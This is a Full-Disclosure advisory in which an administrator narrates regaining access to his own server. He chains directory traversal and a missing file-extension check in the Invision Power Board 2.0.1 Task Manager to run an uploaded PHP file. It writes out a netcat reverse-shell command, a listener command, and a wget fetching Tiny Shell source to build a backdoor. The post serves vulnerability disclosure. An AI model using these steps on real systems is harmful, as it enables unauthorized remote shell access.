--------- Title: Invision Power Board --------- Version: 2.0.1 (maybe more) --------- Severity: Low --------- Info: Invision Board Admin able to execute arbitrary code as uid of the apache process. ---------- Bug(s): #1 Fails to jail location of Task Managers scripts and allows directory traversal. #2 The 'Task PHP File To Run' does not check for '.php' extension and allows user to run uploaded files with any extension including Invision's '.ipb' upload extension. -:Hack Your Own Server Through Invision Power Board Admin Console:- by: Antimatt3r email: antimatter@gmail.com #################################################################### Problem --------- Due to basically lack of sleep and panic over seeing 20 sshd processes when doing a process listing. Without thinking, I did a 'killall -9 sshd' as root.I was immediately disconnected and said 'oh sh17'. I basically just severed my only ability to login to the box and had no means of rebooting it. I run a number of services but keep my system patched. Even the Invision Board has always been patched. Background --------- Collocated server 1200 miles away. No one has access to it for long periods of time, basically complete remote administration. I'm running a couple of forums. One of which uses version 2.0.1 of Invision Power Board. Research\Exploit --------- After long thoughts about what was I going do to be able to get a term on the box and many people telling me "you're screwed" I figured Id start at the weakest point on my box which is the phpbb board (sorry phpbb but we all know its true) used for another site. No obvious holes\misconfigurations. I then logged into the Invision Admin Console because it has a lot of features I've never even looked into and I wasn't sure what I could do. Now here is where it starts getting interesting. I was looking for something that would let me run or add my own php code so I could basically have a 'php shell'. I stumbled across 'Task Manager' where it had some tasks it ran on a chronological basis or to run a task on demand. It also has the ability to add your own task. The tasks are .php files. The problem was that I still had to manually add the php file to the box in a hard coded './sources/tasks/' directory. You then have a field to add the filename for this path. I started with the basic '../../index.php' (this would be the path to the main index.php so I could be sure it was there) to see if this directory was jailed correctly. It Wasn't(Bug #1)! But all I got from that was some errors when it tried to run the 'index.php' as a task file. So I still needed a way to get the file on there. I remember that you could add attachments to the forum and they were stored in the upload directory. The other thing I remember though was that the filenames were scrambled (or changed from what they really were to some kind of post information and a timestamp, for lack of a better word Ill call it a hash from now on) in this directory so I would have no way of knowing what to point the task too. Before I even went down this path I tried adding '../../uploads/' to the task file name. Not that I thought putting a directory in would do anything but just to see if it checked for a '.php' extension on the task file. It didn't (Bug #2)! It basically dumped out errors but that was all I needed to see to know I should be able to pass anything and have the php code executed. The next thing I looked at was how you accessed attachments, hoping maybe I could find the hash name of the file. The link to an attachment looked like http://www.website.com/forum/index.php?act=Attach&type=post&id=27 So there was nothing there to go on other but it made me think the database must have some way of associating id=27 with the hash name. So I then did a full .sql dump which you can do through the web interface. Trying to determine what 27 meant in 10MB of raw sql was not working. I then went back to the Admin Interface and looked at the 'SQL Toolbox' from here you could click any of the tables and a command would be presented so you could run it and see everything in the table. So there was a table call ibf_attachments and I ran the sql cmd 'select * from ibf_attachments'. This gave me the info I needed for what the real uploaded file name was being mapped to in the uploads directory. (I noticed what looked like a keyword combined with a timestamp and given a .ipb extension). So I uploaded my 'php shell' file by posting a topic in the form and adding it as an attachment, found what the name of the file was being stored on the local disk as from database, and then added this to my path of my task file to be executed so it looked something like '../../uploads/' post-5-1130919619.ipb'. Then I just clicked the task run now link in the Admin CP that would execute the script. This kind of worked and I was presented with a place to enter commands that should run but when I would post one of the commands I would get kicked back to the login screen for the admin control panel. I didn't really look into why, I'm assuming I was supposed to post a some session key but I dint want to go through all that since I figured I could just easily run some commands with the system() php command as the Apache user. So I then wrote a very simple php script to connect back to my home computer over a netcat session('netcat myhouseip myport -e /bin/bash'). I did the same trick of uploading the php code as an attachment, finding the locally stored same, and editing my task so the new path. I then set up my box to listen for the connection (netcat -l -p ). I once again click the 'Run Task Now' link. This time the page just held in the loading state. This was because it had executed my netcat code and was waiting for the pipe to be closed. Once connected realized I couldn't su to the root user or any other user because the input for password was the stdin on the remote box. I tried to start ssh but it complained about missing keys. I needed a shell that had a terminal attached. I remember from a wargame before using tiny shell and being able to do more commands. A quick search on Google confirmed this would be what I needed. >>From my netcat session I was able to do a wget to grab the tiny shell 0.6 src (wget http://www.cr0.net:8040/code/network/tsh-0.6.tgz). I had one port above 1024 that had been left open in iptables for a web interface to a game server that was no longer running (long live UT99). I had to edit the 'tsh.h' file by using echos and redirection since I could not use vi from my netcat term (I could have also used the Connect Back option in Tiny Shell if I didnt have an open port). >>From there I just had to to build the application (make linux) and execute the daemon (./thsd). I built it with the same option and ran the client (./tsh serverip) I was connected and given the shell I needed. I immediately su'd and restarted the ssh daemon. Conclusion --------- I would have to say this is a very low severity for most people because you have to be an admin on an Invision Board to be able to do this in the first place. But if the Invision Board is being provided as a service (like the one provided at http://www.invisionboard.com) then the admin can now get elevated privileges and a shell as the uid of the apache process, so in this case it is more serious. Or this can be also very useful if you do something stupid like killing sshd where rebooting is not an option. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/